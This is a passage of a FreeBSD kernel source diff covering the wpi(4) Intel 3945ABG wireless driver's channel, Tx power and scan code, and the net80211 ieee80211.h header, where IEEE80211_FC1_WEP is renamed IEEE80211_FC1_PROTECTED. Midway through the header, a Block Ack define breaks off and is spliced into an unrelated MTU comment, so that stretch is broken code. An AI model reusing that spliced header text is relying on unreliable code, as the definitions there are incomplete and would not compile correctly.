IEEE80211_CHAN_PASSIVE; } if (n == 0) { /* 2GHz band */ c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_B | passive; c = &ic->ic_channels[ic->ic_nchans++]; c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_G | passive; } else { /* 5GHz band */ /* * Some 3945ABG adapters support channels 7, 8, 11 * and 12 in the 2GHz *and* 5GHz bands. * Because of limitations in our net80211(9) stack, * we can't support these channels in 5GHz band. * XXX not true; just need to map to proper frequency */ if (chan <= 14) continue; c->ic_ieee = chan; c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_5GHZ); c->ic_flags = IEEE80211_CHAN_A | passive; } /* save maximum allowed power for this channel */ sc->maxpwr[chan] = channels[i].maxpwr; #if 0 // XXX We can probably use this an get rid of maxpwr - ben 20070617 ic->ic_channels[chan].ic_maxpower = channels[i].maxpwr; //ic->ic_channels[chan].ic_minpower... //ic->ic_channels[chan].ic_maxregtxpower... #endif DPRINTF(("adding chan %d (%dMHz) flags=0x%x maxpwr=%d" " passive=%d, offset %d\n", chan, c->ic_freq, channels[i].flags, sc->maxpwr[chan], (c->ic_flags & IEEE80211_CHAN_PASSIVE) != 0, ic->ic_nchans)); } } static void wpi_read_eeprom_group(struct wpi_softc *sc, int n) { struct wpi_power_group *group = &sc->groups[n]; struct wpi_eeprom_group rgroup; int i; wpi_read_prom_data(sc, WPI_EEPROM_POWER_GRP + n * 32, &rgroup, sizeof rgroup); /* save power group information */ group->chan = rgroup.chan; group->maxpwr = rgroup.maxpwr; /* temperature at which the samples were taken */ group->temp = (int16_t)le16toh(rgroup.temp); DPRINTF(("power group %d: chan=%d maxpwr=%d temp=%d\n", n, group->chan, group->maxpwr, group->temp)); for (i = 0; i < WPI_SAMPLES_COUNT; i++) { group->samples[i].index = rgroup.samples[i].index; group->samples[i].power = rgroup.samples[i].power; DPRINTF(("\tsample %d: index=%d power=%d\n", i, group->samples[i].index, group->samples[i].power)); } } /* * Update Tx power to match what is defined for channel `c'. */ static int wpi_set_txpower(struct wpi_softc *sc, struct ieee80211_channel *c, int async) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power_group *group; struct wpi_cmd_txpower txpower; u_int chan; int i; /* get channel number */ chan = ieee80211_chan2ieee(ic, c); /* find the power group to which this channel belongs */ if (IEEE80211_IS_CHAN_5GHZ(c)) { for (group = &sc->groups[1]; group < &sc->groups[4]; group++) if (chan <= group->chan) break; } else group = &sc->groups[0]; memset(&txpower, 0, sizeof txpower); txpower.band = IEEE80211_IS_CHAN_5GHZ(c) ? 0 : 1; txpower.channel = htole16(chan); /* set Tx power for all OFDM and CCK rates */ for (i = 0; i <= 11 ; i++) { /* retrieve Tx power for this channel/rate combination */ int idx = wpi_get_power_index(sc, group, c, wpi_ridx_to_rate[i]); txpower.rates[i].rate = wpi_ridx_to_plcp[i]; if (IEEE80211_IS_CHAN_5GHZ(c)) { txpower.rates[i].gain_radio = wpi_rf_gain_5ghz[idx]; txpower.rates[i].gain_dsp = wpi_dsp_gain_5ghz[idx]; } else { txpower.rates[i].gain_radio = wpi_rf_gain_2ghz[idx]; txpower.rates[i].gain_dsp = wpi_dsp_gain_2ghz[idx]; } DPRINTFN(WPI_DEBUG_TEMP,("chan %d/rate %d: power index %d\n", chan, wpi_ridx_to_rate[i], idx)); } return wpi_cmd(sc, WPI_CMD_TXPOWER, &txpower, sizeof txpower, async); } /* * Determine Tx power index for a given channel/rate combination. * This takes into account the regulatory information from EEPROM and the * current temperature. */ static int wpi_get_power_index(struct wpi_softc *sc, struct wpi_power_group *group, struct ieee80211_channel *c, int rate) { /* fixed-point arithmetic division using a n-bit fractional part */ #define fdivround(a, b, n) \ ((((1 << n) * (a)) / (b) + (1 << n) / 2) / (1 << n)) /* linear interpolation */ #define interpolate(x, x1, y1, x2, y2, n) \ ((y1) + fdivround(((x) - (x1)) * ((y2) - (y1)), (x2) - (x1), n)) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power_sample *sample; int pwr, idx; u_int chan; /* get channel number */ chan = ieee80211_chan2ieee(ic, c); /* default power is group's maximum power - 3dB */ pwr = group->maxpwr / 2; /* decrease power for highest OFDM rates to reduce distortion */ switch (rate) { case 72: /* 36Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 0 : 5; break; case 96: /* 48Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 7 : 10; break; case 108: /* 54Mb/s */ pwr -= IEEE80211_IS_CHAN_2GHZ(c) ? 9 : 12; break; } /* never exceed channel's maximum allowed Tx power */ pwr = min(pwr, sc->maxpwr[chan]); /* retrieve power index into gain tables from samples */ for (sample = group->samples; sample < &group->samples[3]; sample++) if (pwr > sample[1].power) break; /* fixed-point linear interpolation using a 19-bit fractional part */ idx = interpolate(pwr, sample[0].power, sample[0].index, sample[1].power, sample[1].index, 19); /* * Adjust power index based on current temperature * - if colder than factory-calibrated: decreate output power * - if warmer than factory-calibrated: increase output power */ idx -= (sc->temp - group->temp) * 11 / 100; /* decrease power for CCK rates (-5dB) */ if (!WPI_RATE_IS_OFDM(rate)) idx += 10; /* keep power index in a valid range */ if (idx < 0) return 0; if (idx > WPI_MAX_PWR_INDEX) return WPI_MAX_PWR_INDEX; return idx; #undef interpolate #undef fdivround } /** * Called by net80211 framework to indicate that a scan * is starting. This function doesn't actually do the scan, * wpi_scan_curchan starts things off. This function is more * of an early warning from the framework we should get ready * for the scan. */ static void wpi_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); wpi_set_led(sc, WPI_LED_LINK, 20, 2); WPI_UNLOCK(sc); } /** * Called by the net80211 framework, indicates that the * scan has ended. If there is a scan in progress on the card * then it should be aborted. */ static void wpi_scan_end(struct ieee80211com *ic) { /* XXX ignore */ } /** * Called by the net80211 framework to indicate to the driver * that the channel should be changed */ static void wpi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; int error; /* * Only need to set the channel in Monitor mode. AP scanning and auth * are already taken care of by their respective firmware commands. */ if (ic->ic_opmode == IEEE80211_M_MONITOR) { WPI_LOCK(sc); error = wpi_config(sc); WPI_UNLOCK(sc); if (error != 0) device_printf(sc->sc_dev, "error %d settting channel\n", error); } } /** * Called by net80211 to indicate that we need to scan the current * channel. The channel is previously be set via the wpi_set_channel * callback. */ static void wpi_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { struct ieee80211vap *vap = ss->ss_vap; struct ifnet *ifp = vap->iv_ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); if (wpi_scan(sc)) ieee80211_cancel_scan(vap); WPI_UNLOCK(sc); } /** * Called by the net80211 framework to indicate * the minimum dwell time has been met, terminate the scan. * We don't actually terminate the scan as the firmware will notify * us when it's finished and we have no way to interrupt it. */ static void wpi_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void wpi_hwreset(void *arg, int pending) { struct wpi_softc *sc = arg; WPI_LOCK(sc); wpi_init_locked(sc, 0); WPI_UNLOCK(sc); } static void wpi_rfreset(void *arg, int pending) { struct wpi_softc *sc = arg; WPI_LOCK(sc); wpi_rfkill_resume(sc); WPI_UNLOCK(sc); } /* * Allocate DMA-safe memory for firmware transfer. */ static int wpi_alloc_fwmem(struct wpi_softc *sc) { /* allocate enough contiguous space to store text and data */ return wpi_dma_contig_alloc(sc, &sc->fw_dma, NULL, WPI_FW_MAIN_TEXT_MAXSZ + WPI_FW_MAIN_DATA_MAXSZ, 1, BUS_DMA_NOWAIT); } static void wpi_free_fwmem(struct wpi_softc *sc) { wpi_dma_contig_free(&sc->fw_dma); } /** * Called every second, wpi_watchdog used by the watch dog timer * to check that the card is still alive */ static void wpi_watchdog(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; DPRINTFN(WPI_DEBUG_WATCHDOG,("Watchdog: tick\n")); if (sc->flags & WPI_FLAG_HW_RADIO_OFF) { /* No need to lock firmware memory */ tmp = wpi_mem_read(sc, WPI_MEM_HW_RADIO_OFF); if ((tmp & 0x1) == 0) { /* Radio kill switch is still off */ callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); return; } device_printf(sc->sc_dev, "Hardware Switch Enabled\n"); ieee80211_runtask(ic, &sc->sc_radiotask); return; } if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev,"device timeout\n"); ifp->if_oerrors++; ieee80211_runtask(ic, &sc->sc_restarttask); } } if (sc->sc_scan_timer > 0) { struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (--sc->sc_scan_timer == 0 && vap != NULL) { device_printf(sc->sc_dev,"scan timeout\n"); ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); } } if (ifp->if_drv_flags & IFF_DRV_RUNNING) callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } #ifdef WPI_DEBUG static const char *wpi_cmd_str(int cmd) { switch (cmd) { case WPI_DISABLE_CMD: return "WPI_DISABLE_CMD"; case WPI_CMD_CONFIGURE: return "WPI_CMD_CONFIGURE"; case WPI_CMD_ASSOCIATE: return "WPI_CMD_ASSOCIATE"; case WPI_CMD_SET_WME: return "WPI_CMD_SET_WME"; case WPI_CMD_TSF: return "WPI_CMD_TSF"; case WPI_CMD_ADD_NODE: return "WPI_CMD_ADD_NODE"; case WPI_CMD_TX_DATA: return "WPI_CMD_TX_DATA"; case WPI_CMD_MRR_SETUP: return "WPI_CMD_MRR_SETUP"; case WPI_CMD_SET_LED: return "WPI_CMD_SET_LED"; case WPI_CMD_SET_POWER_MODE: return "WPI_CMD_SET_POWER_MODE"; case WPI_CMD_SCAN: return "WPI_CMD_SCAN"; case WPI_CMD_SET_BEACON:return "WPI_CMD_SET_BEACON"; case WPI_CMD_TXPOWER: return "WPI_CMD_TXPOWER"; case WPI_CMD_BLUETOOTH: return "WPI_CMD_BLUETOOTH"; default: KASSERT(1, ("Unknown Command: %d\n", cmd)); return "UNKNOWN CMD"; /* Make the compiler happy */ } } #endif MODULE_DEPEND(wpi, pci, 1, 1, 1); MODULE_DEPEND(wpi, wlan, 1, 1, 1); MODULE_DEPEND(wpi, firmware, 1, 1, 1); diff --git a/sys/net80211/ieee80211.h b/sys/net80211/ieee80211.h index 0b1f05027393..9b005f3d6b89 100644 --- a/sys/net80211/ieee80211.h +++ b/sys/net80211/ieee80211.h @@ -1,1118 +1,1118 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * $FreeBSD$ */ #ifndef _NET80211_IEEE80211_H_ #define _NET80211_IEEE80211_H_ /* * 802.11 protocol definitions. */ #define IEEE80211_ADDR_LEN 6 /* size of 802.11 address */ /* is 802.11 address multicast/broadcast? */ #define IEEE80211_IS_MULTICAST(_a) (*(_a) & 0x01) typedef uint16_t ieee80211_seq; /* IEEE 802.11 PLCP header */ struct ieee80211_plcp_hdr { uint16_t i_sfd; uint8_t i_signal; uint8_t i_service; uint16_t i_length; uint16_t i_crc; } __packed; #define IEEE80211_PLCP_SFD 0xF3A0 #define IEEE80211_PLCP_SERVICE 0x00 #define IEEE80211_PLCP_SERVICE_LOCKED 0x04 #define IEEE80211_PLCL_SERVICE_PBCC 0x08 #define IEEE80211_PLCP_SERVICE_LENEXT5 0x20 #define IEEE80211_PLCP_SERVICE_LENEXT6 0x40 #define IEEE80211_PLCP_SERVICE_LENEXT7 0x80 /* * generic definitions for IEEE 802.11 frames */ struct ieee80211_frame { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; /* possibly followed by addr4[IEEE80211_ADDR_LEN]; */ /* see below */ } __packed; struct ieee80211_qosframe { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_qos[2]; /* possibly followed by addr4[IEEE80211_ADDR_LEN]; */ /* see below */ } __packed; struct ieee80211_qoscntl { uint8_t i_qos[2]; }; struct ieee80211_frame_addr4 { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_addr4[IEEE80211_ADDR_LEN]; } __packed; struct ieee80211_qosframe_addr4 { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_addr4[IEEE80211_ADDR_LEN]; uint8_t i_qos[2]; } __packed; #define IEEE80211_FC0_VERSION_MASK 0x03 #define IEEE80211_FC0_VERSION_SHIFT 0 #define IEEE80211_FC0_VERSION_0 0x00 #define IEEE80211_FC0_TYPE_MASK 0x0c #define IEEE80211_FC0_TYPE_SHIFT 2 #define IEEE80211_FC0_TYPE_MGT 0x00 #define IEEE80211_FC0_TYPE_CTL 0x04 #define IEEE80211_FC0_TYPE_DATA 0x08 #define IEEE80211_FC0_SUBTYPE_MASK 0xf0 #define IEEE80211_FC0_SUBTYPE_SHIFT 4 /* for TYPE_MGT */ #define IEEE80211_FC0_SUBTYPE_ASSOC_REQ 0x00 #define IEEE80211_FC0_SUBTYPE_ASSOC_RESP 0x10 #define IEEE80211_FC0_SUBTYPE_REASSOC_REQ 0x20 #define IEEE80211_FC0_SUBTYPE_REASSOC_RESP 0x30 #define IEEE80211_FC0_SUBTYPE_PROBE_REQ 0x40 #define IEEE80211_FC0_SUBTYPE_PROBE_RESP 0x50 #define IEEE80211_FC0_SUBTYPE_BEACON 0x80 #define IEEE80211_FC0_SUBTYPE_ATIM 0x90 #define IEEE80211_FC0_SUBTYPE_DISASSOC 0xa0 #define IEEE80211_FC0_SUBTYPE_AUTH 0xb0 #define IEEE80211_FC0_SUBTYPE_DEAUTH 0xc0 #define IEEE80211_FC0_SUBTYPE_ACTION 0xd0 #define IEEE80211_FC0_SUBTYPE_ACTION_NOACK 0xe0 /* for TYPE_CTL */ #define IEEE80211_FC0_SUBTYPE_BAR 0x80 #define IEEE80211_FC0_SUBTYPE_BA 0x90 #define IEEE80211_FC0_SUBTYPE_PS_POLL 0xa0 #define IEEE80211_FC0_SUBTYPE_RTS 0xb0 #define IEEE80211_FC0_SUBTYPE_CTS 0xc0 #define IEEE80211_FC0_SUBTYPE_ACK 0xd0 #define IEEE80211_FC0_SUBTYPE_CF_END 0xe0 #define IEEE80211_FC0_SUBTYPE_CF_END_ACK 0xf0 /* for TYPE_DATA (bit combination) */ #define IEEE80211_FC0_SUBTYPE_DATA 0x00 #define IEEE80211_FC0_SUBTYPE_CF_ACK 0x10 #define IEEE80211_FC0_SUBTYPE_CF_POLL 0x20 #define IEEE80211_FC0_SUBTYPE_CF_ACPL 0x30 #define IEEE80211_FC0_SUBTYPE_NODATA 0x40 #define IEEE80211_FC0_SUBTYPE_CFACK 0x50 #define IEEE80211_FC0_SUBTYPE_CFPOLL 0x60 #define IEEE80211_FC0_SUBTYPE_CF_ACK_CF_ACK 0x70 #define IEEE80211_FC0_SUBTYPE_QOS 0x80 #define IEEE80211_FC0_SUBTYPE_QOS_NULL 0xc0 #define IEEE80211_FC1_DIR_MASK 0x03 #define IEEE80211_FC1_DIR_NODS 0x00 /* STA->STA */ #define IEEE80211_FC1_DIR_TODS 0x01 /* STA->AP */ #define IEEE80211_FC1_DIR_FROMDS 0x02 /* AP ->STA */ #define IEEE80211_FC1_DIR_DSTODS 0x03 /* AP ->AP */ #define IEEE80211_IS_DSTODS(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) #define IEEE80211_FC1_MORE_FRAG 0x04 #define IEEE80211_FC1_RETRY 0x08 #define IEEE80211_FC1_PWR_MGT 0x10 #define IEEE80211_FC1_MORE_DATA 0x20 -#define IEEE80211_FC1_WEP 0x40 +#define IEEE80211_FC1_PROTECTED 0x40 #define IEEE80211_FC1_ORDER 0x80 #define IEEE80211_SEQ_FRAG_MASK 0x000f #define IEEE80211_SEQ_FRAG_SHIFT 0 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define IEEE80211_SEQ_RANGE 4096 #define IEEE80211_SEQ_ADD(seq, incr) \ (((seq) + (incr)) & (IEEE80211_SEQ_RANGE-1)) #define IEEE80211_SEQ_INC(seq) IEEE80211_SEQ_ADD(seq,1) #define IEEE80211_SEQ_SUB(a, b) \ (((a) + IEEE80211_SEQ_RANGE - (b)) & (IEEE80211_SEQ_RANGE-1)) #define IEEE80211_SEQ_BA_RANGE 2048 /* 2^11 */ #define IEEE80211_SEQ_BA_BEFORE(a, b) \ (IEEE80211_SEQ_SUB(b, a+1) < IEEE80211_SEQ_BA_RANGE-1) #define IEEE80211_NWID_LEN 32 #define IEEE80211_MESHID_LEN 32 #define IEEE80211_QOS_TXOP 0x00ff /* bit 8 is reserved */ #define IEEE80211_QOS_AMSDU 0x80 #define IEEE80211_QOS_AMSDU_S 7 #define IEEE80211_QOS_ACKPOLICY 0x60 #define IEEE80211_QOS_ACKPOLICY_S 5 #define IEEE80211_QOS_ACKPOLICY_NOACK 0x20 /* No ACK required */ #define IEEE80211_QOS_ACKPOLICY_BA 0x60 /* Block ACK */ #define IEEE80211_QOS_EOSP 0x10 /* EndOfService Period*/ #define IEEE80211_QOS_EOSP_S 4 #define IEEE80211_QOS_TID 0x0f /* qos[1] byte used for all frames sent by mesh STAs in a mesh BSS */ #define IEEE80211_QOS_MC 0x01 /* Mesh control */ /* Mesh power save level*/ #define IEEE80211_QOS_MESH_PSL 0x02 /* Mesh Receiver Service Period Initiated */ #define IEEE80211_QOS_RSPI 0x04 /* bits 11 to 15 reserved */ /* does frame have QoS sequence control data */ #define IEEE80211_QOS_HAS_SEQ(wh) \ (((wh)->i_fc[0] & \ (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_QOS)) == \ (IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_QOS)) /* * WME/802.11e information element. */ struct ieee80211_wme_info { uint8_t wme_id; /* IEEE80211_ELEMID_VENDOR */ uint8_t wme_len; /* length in bytes */ uint8_t wme_oui[3]; /* 0x00, 0x50, 0xf2 */ uint8_t wme_type; /* OUI type */ uint8_t wme_subtype; /* OUI subtype */ uint8_t wme_version; /* spec revision */ uint8_t wme_info; /* QoS info */ } __packed; /* * WME/802.11e Tspec Element */ struct ieee80211_wme_tspec { uint8_t ts_id; uint8_t ts_len; uint8_t ts_oui[3]; uint8_t ts_oui_type; uint8_t ts_oui_subtype; uint8_t ts_version; uint8_t ts_tsinfo[3]; uint8_t ts_nom_msdu[2]; uint8_t ts_max_msdu[2]; uint8_t ts_min_svc[4]; uint8_t ts_max_svc[4]; uint8_t ts_inactv_intv[4]; uint8_t ts_susp_intv[4]; uint8_t ts_start_svc[4]; uint8_t ts_min_rate[4]; uint8_t ts_mean_rate[4]; uint8_t ts_max_burst[4]; uint8_t ts_min_phy[4]; uint8_t ts_peak_rate[4]; uint8_t ts_delay[4]; uint8_t ts_surplus[2]; uint8_t ts_medium_time[2]; } __packed; /* * WME AC parameter field */ struct ieee80211_wme_acparams { uint8_t acp_aci_aifsn; uint8_t acp_logcwminmax; uint16_t acp_txop; } __packed; #define WME_NUM_AC 4 /* 4 AC categories */ #define WME_NUM_TID 16 /* 16 tids */ #define WME_PARAM_ACI 0x60 /* Mask for ACI field */ #define WME_PARAM_ACI_S 5 /* Shift for ACI field */ #define WME_PARAM_ACM 0x10 /* Mask for ACM bit */ #define WME_PARAM_ACM_S 4 /* Shift for ACM bit */ #define WME_PARAM_AIFSN 0x0f /* Mask for aifsn field */ #define WME_PARAM_AIFSN_S 0 /* Shift for aifsn field */ #define WME_PARAM_LOGCWMIN 0x0f /* Mask for CwMin field (in log) */ #define WME_PARAM_LOGCWMIN_S 0 /* Shift for CwMin field */ #define WME_PARAM_LOGCWMAX 0xf0 /* Mask for CwMax field (in log) */ #define WME_PARAM_LOGCWMAX_S 4 /* Shift for CwMax field */ #define WME_AC_TO_TID(_ac) ( \ ((_ac) == WME_AC_VO) ? 6 : \ ((_ac) == WME_AC_VI) ? 5 : \ ((_ac) == WME_AC_BK) ? 1 : \ 0) #define TID_TO_WME_AC(_tid) ( \ ((_tid) == 0 || (_tid) == 3) ? WME_AC_BE : \ ((_tid) < 3) ? WME_AC_BK : \ ((_tid) < 6) ? WME_AC_VI : \ WME_AC_VO) /* * WME Parameter Element */ struct ieee80211_wme_param { uint8_t param_id; uint8_t param_len; uint8_t param_oui[3]; uint8_t param_oui_type; uint8_t param_oui_subtype; uint8_t param_version; uint8_t param_qosInfo; #define WME_QOSINFO_COUNT 0x0f /* Mask for param count field */ uint8_t param_reserved; struct ieee80211_wme_acparams params_acParams[WME_NUM_AC]; } __packed; /* * Management Notification Frame */ struct ieee80211_mnf { uint8_t mnf_category; uint8_t mnf_action; uint8_t mnf_dialog; uint8_t mnf_status; } __packed; #define MNF_SETUP_REQ 0 #define MNF_SETUP_RESP 1 #define MNF_TEARDOWN 2 /* * 802.11n Management Action Frames */ /* generic frame format */ struct ieee80211_action { uint8_t ia_category; uint8_t ia_action; } __packed; #define IEEE80211_ACTION_CAT_SM 0 /* Spectrum Management */ #define IEEE80211_ACTION_CAT_QOS 1 /* QoS */ #define IEEE80211_ACTION_CAT_DLS 2 /* DLS */ #define IEEE80211_ACTION_CAT_BA 3 /* BA */ #define IEEE80211_ACTION_CAT_HT 7 /* HT */ #define IEEE80211_ACTION_CAT_MESH 13 /* Mesh */ #define IEEE80211_ACTION_CAT_SELF_PROT 15 /* Self-protected */ /* 16 - 125 reserved */ #define IEEE80211_ACTION_CAT_VENDOR 127 /* Vendor Specific */ #define IEEE80211_ACTION_HT_TXCHWIDTH 0 /* recommended xmit chan width*/ #define IEEE80211_ACTION_HT_MIMOPWRSAVE 1 /* MIMO power save */ /* HT - recommended transmission channel width */ struct ieee80211_action_ht_txchwidth { struct ieee80211_action at_header; uint8_t at_chwidth; } __packed; #define IEEE80211_A_HT_TXCHWIDTH_20 0 #define IEEE80211_A_HT_TXCHWIDTH_2040 1 /* HT - MIMO Power Save (NB: D2.04) */ struct ieee80211_action_ht_mimopowersave { struct ieee80211_action am_header; uint8_t am_control; } __packed; #define IEEE80211_A_HT_MIMOPWRSAVE_ENA 0x01 /* PS enabled */ #define IEEE80211_A_HT_MIMOPWRSAVE_MODE 0x02 #define IEEE80211_A_HT_MIMOPWRSAVE_MODE_S 1 #define IEEE80211_A_HT_MIMOPWRSAVE_DYNAMIC 0x02 /* Dynamic Mode */ #define IEEE80211_A_HT_MIMOPWRSAVE_STATIC 0x00 /* no SM packets */ /* bits 2-7 reserved */ /* Block Ack actions */ #define IEEE80211_ACTION_BA_ADDBA_REQUEST 0 /* ADDBA request */ #define IEEE80211_ACTION_BA_ADDBA_RESPONSE 1 /* ADDBA response */ #define IEEE80211_ACTION_BA_DELBA 2 /* DELBA */ /* Block Ack Parameter Set */ #define IEEE80211_BAPS_BUFSIZ 0xffc0 /* buffer size */ #define IEEE80211_BAPS_BUFSIZ_S 6 #define IEEE80211_BAPS_TID 0x003c /* TID */ #define IEEE80211_BAPS_TID_S 2 #define IEEE80211_BAPS_POLICY 0x0002 /* block ack policy */ #define IEEE80211_BAPS_POLICY_S 1 #define IEEE80211_BAPS_POLICY_DELAYED (0< IEEE80211_MIN_LEN. The default * mtu is Ethernet-compatible; it's set by ether_ifattach. */ #define IEEE80211_MTU_MAX 2290 #define IEEE80211_MTU_MIN 32 #define IEEE80211_MAX_LEN (2300 + IEEE80211_CRC_LEN + \ (IEEE80211_WEP_IVLEN + IEEE80211_WEP_KIDLEN + IEEE80211_WEP_CRCLEN)) #define IEEE80211_ACK_LEN \ (sizeof(struct ieee80211_frame_ack) + IEEE80211_CRC_LEN) #define IEEE80211_MIN_LEN \ (sizeof(struct ieee80211_frame_min) + IEEE80211_CRC_LEN) /* * The 802.11 spec says at most 2007 stations may be * associated at once. For most AP's this is way more * than is feasible so we use a default of IEEE80211_AID_DEF. * This number may be overridden by the driver and/or by * user configuration but may not be less than IEEE80211_AID_MIN * (see _ieee80211.h for implementation-specific settings). */ #define IEEE80211_AID_MAX 2007 #define IEEE80211_AID(b) ((b) &~ 0xc000) /* * RTS frame length parameters. The default is specified in * the 802.11 spec as 512; we treat it as implementation-dependent * so it's defined in ieee80211_var.h. The max may be wrong * for jumbo frames. */ #define IEEE80211_RTS_MIN 1 #define IEEE80211_RTS_MAX 2346 /* * TX fragmentation parameters. As above for RTS, we treat * default as implementation-dependent so define it elsewhere. */ #define IEEE80211_FRAG_MIN 256 #define IEEE80211_FRAG_MAX 2346 /* * Beacon interval (TU's). Min+max come from WiFi requirements. * As above, we treat default as implementation-dependent so * define it elsewhere. */ #define IEEE80211_BINTVAL_MAX 1000 /* max beacon interval (TU's) */ #define IEEE80211_BINTVAL_MIN 25 /* min beacon interval (TU's) */ /* * DTIM period (beacons). Min+max are not really defined * by the protocol but we want them publicly visible so * define them here. */ #define IEEE80211_DTIM_MAX 15 /* max DTIM period */ #define IEEE80211_DTIM_MIN 1 /* min DTIM period */ /* * Beacon miss threshold (beacons). As for DTIM, we define * them here to be publicly visible. Note the max may be * clamped depending on device capabilities. */ #define IEEE80211_HWBMISS_MIN 1 #define IEEE80211_HWBMISS_MAX 255 /* * 802.11 frame duration definitions. */ struct ieee80211_duration { uint16_t d_rts_dur; uint16_t d_data_dur; uint16_t d_plcp_len; uint8_t d_residue; /* unused octets in time slot */ }; /* One Time Unit (TU) is 1Kus = 1024 microseconds. */ #define IEEE80211_DUR_TU 1024 /* IEEE 802.11b durations for DSSS PHY in microseconds */ #define IEEE80211_DUR_DS_LONG_PREAMBLE 144 #define IEEE80211_DUR_DS_SHORT_PREAMBLE 72 #define IEEE80211_DUR_DS_SLOW_PLCPHDR 48 #define IEEE80211_DUR_DS_FAST_PLCPHDR 24 #define IEEE80211_DUR_DS_SLOW_ACK 112 #define IEEE80211_DUR_DS_FAST_ACK 56 #define IEEE80211_DUR_DS_SLOW_CTS 112 #define IEEE80211_DUR_DS_FAST_CTS 56 #define IEEE80211_DUR_DS_SLOT 20 #define IEEE80211_DUR_DS_SIFS 10 #define IEEE80211_DUR_DS_PIFS (IEEE80211_DUR_DS_SIFS + IEEE80211_DUR_DS_SLOT) #define IEEE80211_DUR_DS_DIFS (IEEE80211_DUR_DS_SIFS + \ 2 * IEEE80211_DUR_DS_SLOT) #define IEEE80211_DUR_DS_EIFS (IEEE80211_DUR_DS_SIFS + \ IEEE80211_DUR_DS_SLOW_ACK + \ IEEE80211_DUR_DS_LONG_PREAMBLE + \ IEEE80211_DUR_DS_SLOW_PLCPHDR + \ IEEE80211_DUR_DIFS) #endif /* _NET80211_IEEE80211_H_ */ diff --git a/sys/net80211/ieee80211_adhoc.c b/sys/net80211/ieee80211_adhoc.c index e40a238d6140..181b9220de62 100644 --- a/sys/net80211/ieee80211_adhoc.c +++ b/sys/net80211/ieee80211_adhoc.c @@ -1,958 +1,958 @@ /*- * Copyright (c) 2007-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED 